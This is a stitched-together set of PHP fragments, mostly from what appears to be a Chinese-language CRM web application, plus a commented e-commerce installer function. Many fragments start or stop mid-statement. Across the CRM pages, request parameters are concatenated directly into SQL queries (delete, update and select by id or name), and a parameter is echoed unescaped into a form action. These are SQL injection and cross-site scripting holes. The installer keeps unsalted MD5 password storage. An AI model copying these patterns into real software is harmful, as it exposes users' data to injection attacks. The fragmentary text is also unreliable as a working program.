$penson_list = $db->selectLimit($sqlstr, $page_size, ($page - 1) * $page_size); $total_nums = $db->getRowsNum($sqlstr); foreach ($penson_list as $vo) { $output[] = $vo; } if ($total_nums == 0) { $output[0] = "{id:0,companyName:没有数据}"; $total_nums = 1; } $rst['total'] = $total_nums; $rst['rows'] = $output; print json_encode($rst); } elseif ($act == "mod") { $record = json_decode($json, true); if ($record["id"] == 0) { $db->insert($GLOBALS[databasePrefix] . 'sms', $record); } else { $db->update($GLOBALS[databasePrefix] . 'sms', $record, 'id=' . $record["id"]); } print $record['id'] . "修改成功"; } elseif ($act == "del") { $ids = getvar("ids"); $sqlstr = "delete from {pre}sms where id in (" . $ids . ")"; $sqlstr = get_sql($sqlstr); $db->query($sqlstr); print "删除成功"; } elseif ($act == "add") { $record = json_decode($json, true); $db->insert($GLOBALS[databasePrefix] . 'sms', $record); print "新增成功"; }
<?php session_start(); require_once '../session.php'; require_once '../inc/const.php'; $id = getvar('id'); $id = empty($id) ? 0 : $id; $industry = getvar('industry'); $act = getvar("act"); $act = empty($act) ? "add2" : $act; mysql_query(get_sql("update {pre}customer set viewcount=IF(ISNULL(viewcount),0,viewcount) + 1 where id=" . $id)); $sql = get_sql("select * from {pre}customer where id=" . $id . " order by id"); $list = $db->getonerow($sql); $industry = empty($industry) ? $list['industry'] : $industry; ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>客户信息</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="../jquerymobile/jquery.mobile-1.3.2.min.css"> <script src="../jquerymobile/jquery-1.8.3.min.js"></script> <script src="../jquerymobile/jquery.mobile-1.3.2.min.js"></script> <body> <form method="post" action="./customer_ok.php?act=<?php echo $act; ?> " data-ajax="false" > <div data-role="page" id="page1"> <div data-role="header" data-position="fixed"> <a href="../cm.php" data-icon="home" data-ajax="false" >首页</a><h1>客户信息</h1><a data-ajax="false" href="./mcustomer_list.php?industry=<?php
<?php session_start(); require '../session.php'; include '../inc/const.php'; $fid = getvar("fid"); $page = getvar("page") ? getvar("page") : 1; $page_size = 20; $sqlstr = get_sql("select * from {pre}services order by rank asc,id asc"); $area_list = $db->selectLimit($sqlstr, $page_size, ($page - 1) * $page_size); $total_nums = $db->getRowsNum($sqlstr); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>无标题文档</title> <link href="../css/admin_css.css" rel="stylesheet" type="text/css" /> </head> <script> function checkreg() { if (document.myform.name.value=="") { window.alert("类别名称不能为空!!"); document.myform.name.focus(); return (false); } if (document.myform.rank.value=="") { window.alert("排序ID不能为空!!"); document.myform.rank.focus(); return (false);
$db->update($GLOBALS[databasePrefix] . 'customer', $record, 'id=' . $id); echo "<script type='text/javascript' charset='utf-8'>alert('转移客户成功!');window.location='customer_list.php';</script>"; } //公共客户 if ($act == 'public') { $record = array('name' => $name, 'addr' => $addr, 'httpurl' => $httpurl, 'tel' => $tel, 'mobile' => $mobile, 'fax' => $fax, 'email' => $email, 'qq' => $qq, 'area' => $area, 'industry' => $industry, 'services' => $services, 'rank' => $rank, 'managerid' => '', 'msn' => getvar('msn'), 'skype' => getvar('skype'), 'source' => getvar('source'), 'level' => getvar('level'), 'createTime' => date('Y-m-d h-m-s'), 'createUser' => $_SESSION['username'], 'updateTime' => date('Y-m-d h-m-s'), 'dateline' => date('Y-m-d h-m-s')); if ($id > 0) { $db->update($GLOBALS[databasePrefix] . 'customer', $record, 'id=' . $id); } else { $id = $db->insert($GLOBALS[databasePrefix] . 'customer', $record); } echo "<script type='text/javascript' charset='utf-8'>alert('公海客户成功!');window.location='customer_list.php?managerid=public';</script>"; } //删除 if ($act == 'delService' || $act == "delService2") { $sql = get_sql("select * from {pre}services where isdel=0 and pid=" . getvar("sid")); $rowCount = $db->getRowsNum($sql); if ($rowCount > 0) { echo "<script type='text/javascript' charset='utf-8'>alert('请先删除下面的回复!');window.location='customer_action.php?tab=1&act=mod&id=" . getvar("id") . "';</script>"; exit; } $record = array('isdel' => '1', 'userid' => $_SESSION['username']); $db->update($GLOBALS[databasePrefix] . 'services', $record, 'id=' . getvar("sid")); if ($act == "delService2") { echo "<script type='text/javascript' charset='utf-8'>window.location.href='mservice_add.php?act=mod&id=" . getvar("id") . "';</script>"; } else { echo "<script type='text/javascript' charset='utf-8'>window.location='customer_action.php?tab=1&act=mod&id=" . getvar("id") . "';</script>"; } } //新增联系小记 if ($act == 'addService' || $act == 'addService2') {
?> </table> </div> <div class="col6"> <h2>最近7天新增客户跟进统计</h2> <table width="98%" height="94" border="0" cellpadding="3" cellspacing="1" bgcolor="#cccccc" style="margin:0 auto;padding-top:10px;"> <thead> <tr bgcolor="#f9f9f9"> <td width="5%" height="24" align="center" valign="middle">用户名</td> <td width="20%" height="24" align="center" valign="middle">数量</td> </tr> </thead> <?php $sqlstr = get_sql("SELECT userid,COUNT(*) AS c FROM {pre}services WHERE DATE_SUB(CURDATE(), INTERVAL 7 DAY) <= DATE(dateline) GROUP BY userid"); $list = $db->getList($sqlstr); foreach ($list as $c) { ?> <tr bgcolor="#f9f9f9"> <td width="5%" align="center" valign="middle"><?php echo getRealnamebyName($c['userid']); ?> </td> <td align="center" valign="middle"><?php echo $c['c']; ?> </td> </tr> <?php } ?>
$first_data='no'; } foreach($array as $key=>$value) { if($key=='id') { echo '<td><input type=submit name=id value=\''.$value.'\'></td>'; } else { echo '<td>'.$value.'</td>'; } } echo '</tr>'; } echo '</table>'; echo '</form>'; } echo '<h2 style="page-break-before: always;"></h2>'; if(isset($_POST['id'])) { view_data($_POST['id']); } get_sql(); ?>
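/**
 * Finish the installation: connect to the database, create the schema, load
 * the initial data plus the administrator account, write the configuration
 * and system-info files, create the installer lock file and hand over to the
 * integration step when one is present.
 *
 * Changes in this revision:
 *  - extract($_POST) is replaced by explicit reads of the fields this step
 *    uses, so a posted key can no longer overwrite an arbitrary local.
 *  - The administrator name and e-mail are escaped before they are placed in
 *    the INSERT statement.
 *  - Server versions are compared with version_compare(); the old string
 *    comparison treated "10.x" as lower than "4.1".
 *  - The table prefix is quoted before it is used inside a regular expression.
 *
 * NOTE(review): the administrator password is stored as an unsalted
 * md5(password). MD5 is not a password hash; it is kept because the login
 * code that verifies it is not visible here.
 * NOTE(review): $site_url comes from the request and is placed inside the
 * JavaScript handed to show_process(); it should be validated as a URL and
 * encoded for a script context.
 *
 * @author Garbin
 * @return bool|null False on failure and on the plain "done" path; no value
 *                   when the integration step is started.
 */
function install_done()
{
    $db_host = isset($_POST['db_host']) ? $_POST['db_host'] : '';
    $db_port = isset($_POST['db_port']) ? $_POST['db_port'] : '';
    $db_user = isset($_POST['db_user']) ? $_POST['db_user'] : '';
    $db_pass = isset($_POST['db_pass']) ? $_POST['db_pass'] : '';
    $db_name = isset($_POST['db_name']) ? $_POST['db_name'] : '';
    $db_prefix = isset($_POST['db_prefix']) ? $_POST['db_prefix'] : '';
    $admin_name = isset($_POST['admin_name']) ? $_POST['admin_name'] : '';
    $admin_pass = isset($_POST['admin_pass']) ? $_POST['admin_pass'] : '';
    $admin_email = isset($_POST['admin_email']) ? $_POST['admin_email'] : '';
    $site_url = isset($_POST['site_url']) ? $_POST['site_url'] : '';

    /* Code handed to the integration step below.
       NOTE(review): rand() is predictable; do not treat this as a secret. */
    $_code = rand(10000, 99999);
    setcookie('__INTECODE__', $_code, 0, '/');

    /* Connect to the database server */
    $con = mysql_connect($db_host . ':' . $db_port, $db_user, $db_pass);
    if (!$con) {
        show_process(r(Lang::get('connect_db'), false), 'parent.show_warning("' . Lang::get('connect_db_error') . '")');
        return false;
    }
    show_process(r(Lang::get('connect_db'), true));

    $version = mysql_get_server_info();
    $charset = str_replace('-', '', CHARSET);
    if (version_compare($version, '4.1', '>')) {
        if ($charset != 'latin1') {
            mysql_query("SET character_set_connection={$charset}, character_set_results={$charset}, character_set_client=binary", $con);
        }
        if (version_compare($version, '5.0.1', '>')) {
            mysql_query("SET sql_mode=''", $con);
        }
    }

    /* Select the database */
    $selected_db = mysql_select_db($db_name, $con);
    if (!$selected_db) {
        show_process(r(Lang::get('selecte_db'), false), 'parent.show_warning("' . Lang::get('selecte_db_error') . '");');
        return false;
    }

    /* Create the schema */
    show_process(r(Lang::get('start_setup_db'), true));
    $sqls = get_sql(version_data('structure.sql'));
    $quoted_prefix = preg_quote($db_prefix, '/');
    foreach ($sqls as $sql) {
        $sql = replace_prefix('ecm_', $db_prefix, $sql);
        if (substr($sql, 0, 12) == 'CREATE TABLE') {
            $name = preg_replace("/CREATE TABLE `{$quoted_prefix}([a-z0-9_]+)` .*/is", "\\1", $sql);
            mysql_query(create_table($sql), $con);
            show_process(r(sprintf(Lang::get('create_table'), $name), true, 1));
        } else {
            mysql_query($sql, $con);
        }
    }

    /* Load the initial data (TODO from the original: not complete yet) */
    $sqls = get_sql(version_data('initdata.sql'));
    $password = md5($admin_pass);
    // NOTE(review): if the installer bootstrap already slashes $_POST
    // (magic_quotes_gpc or a global addslashes), remove that layer rather
    // than this one.
    $safe_name = mysql_real_escape_string($admin_name, $con);
    $safe_email = mysql_real_escape_string($admin_email, $con);
    $sqls[] = "INSERT INTO `ecm_member`(user_name, email, password, reg_time) VALUES('{$safe_name}', '{$safe_email}', '{$password}', " . gmtime() . ")";
    foreach ($sqls as $sql) {
        $rzt = mysql_query(replace_prefix('ecm_', $db_prefix, $sql), $con);
        if (!$rzt) {
            show_process(r(Lang::get('install_initdata'), false), 'parent.show_warning("' . mysql_error() . '");');
            return false;
        }
    }
    if (mysql_errno()) {
        echo mysql_error();
    }
    show_process(r(Lang::get('install_initdata'), true));

    /* Write the configuration file. It contains the database password, so
       the file must not be readable through the web server. */
    $db_config = "mysql://{$db_user}:{$db_pass}@{$db_host}:{$db_port}/{$db_name}";
    $ecm_key = get_ecm_key();
    $mall_site_id = product_id();
    save_config_file(array(
        'SITE_URL' => $site_url,
        'DB_CONFIG' => $db_config,
        'DB_PREFIX' => $db_prefix,
        'LANG' => LANG,
        'COOKIE_DOMAIN' => '',
        'COOKIE_PATH' => '/',
        'ECM_KEY' => $ecm_key,
        'MALL_SITE_ID' => $mall_site_id,
        'ENABLED_GZIP' => 0,
        'DEBUG_MODE' => 0,
        'CACHE_SERVER' => 'default',
        'MEMBER_TYPE' => 'default',
        'ENABLED_SUBDOMAIN' => 0,
        'SUBDOMAIN_SUFFIX' => '',
    ));

    /* Write the system information */
    save_system_info(array('version' => VERSION, 'release' => RELEASE));
    show_process(r(Lang::get('setup_config'), true));

    /* Lock the installer so it cannot be run again */
    touch(LOCK_FILE);
    show_process(r(Lang::get('lock_install'), true));

    if (is_file(ROOT_PATH . '/integrate/index.php')) {
        /* Continue with the integration program */
        show_process(r(Lang::get('install_done'), true), 'parent.goon_install("' . $site_url . '/integrate/index.php", "' . $_code . '");');
    } else {
        /* Installation finished */
        show_process(r(Lang::get('install_done'), true), 'parent.install_successed();');
        return false;
    }
}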
<title>无标题文档</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="http://code.jquery.com/mobile/1.2.0/jquery.mobile-1.2.0.min.css" /> <script src="http://code.jquery.com/jquery-1.8.2.min.js"></script> <script src="http://code.jquery.com/mobile/1.2.0/jquery.mobile-1.2.0.min.js"></script> <body> <div data-role="page" id="page1"> <div data-role="header"> <a href="./mcustomer_list.php">返回</a><h1>客户详细页面</h1> </div> <div data-role="content"> <?php $page = $_GET['page'] ? $_GET['page'] : 1; $page_size = 20; $sqlstr = get_sql("select * from {pre}services where 1=1 and fid=" . $id . " order by dateline desc"); $s_list = $db->selectLimit($sqlstr, $page_size, ($page - 1) * $page_size); $total_nums = $db->getRowsNum($sqlstr); ?> <?php $i = 0; foreach ($s_list as $lists) { $i = $i + 1; $remindTime = $lists['remindTime']; $dateline = $lists['dateline']; ?> <div class="ui-block-a" style="width:120px" ><?php echo $i; ?>
?> <tr> <td height="24" colspan="9" bgcolor="#F8FCF6"><?php page($sqlstr, $page_size, "customer_list.php?industry=" . getvar(industry) . "&managerid=" . $managerid . "&queryname=" . $queryname . "&page", $page); ?> </td> </tr> </table> <div class="h2 text-center">下属客户情况</a> <table class="table table-hover table-bordered"> <thead> <tr bgcolor="#f5f5f5" class="text-center"><td>姓名</td><td>客户数量</td></tr> </thead> <?php $sqlstr = get_sql("select id,username,usermenu from {pre}manager where pid=" . $userId . " order by id desc"); $s_list = $db->getlist($sqlstr); $tabStr = ""; foreach ($s_list as $vo) { ?> <tr><td> <a href="./customer_list.php?industry=<?php echo $industry; ?> &username=<?php echo $vo['username']; ?> "> <?php echo $vo['usermenu']; ?>
$sqlstr = $sqlstr . " and name='" . getvar("name") . "'"; } } if (getvar("act") == "submit") { $record = array('type' => getvar("type"), 'code' => getvar("code"), 'name' => getvar("name"), 'sort' => getvar("sort"), 'remark' => getvar("remark")); if ($id > 0) { $db->update($GLOBALS[databasePrefix] . 'dic', $record, 'id=' . $id); } else { $id = $db->insert($GLOBALS[databasePrefix] . 'dic', $record); } echo "<script>alert('保存成功!');window.location='customer_dic.php';</script>"; } if (getvar("act") == "mod") { $vo = $db->getOneRow(get_sql("select * from {pre}dic where id = " . $id)); } $sqlstr = get_sql($sqlstr . " order by id asc"); $area_list = $db->selectLimit($sqlstr, $page_size, ($page - 1) * $page_size); $total_nums = $db->getRowsNum($sqlstr); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>无标题文档</title> <link href="../css/admin_css.css" rel="stylesheet" type="text/css" /> <link href="../js/boxy.css" rel="stylesheet" type="text/css" /> </head> <script> function checkreg() { if (document.myform.name.value=="") {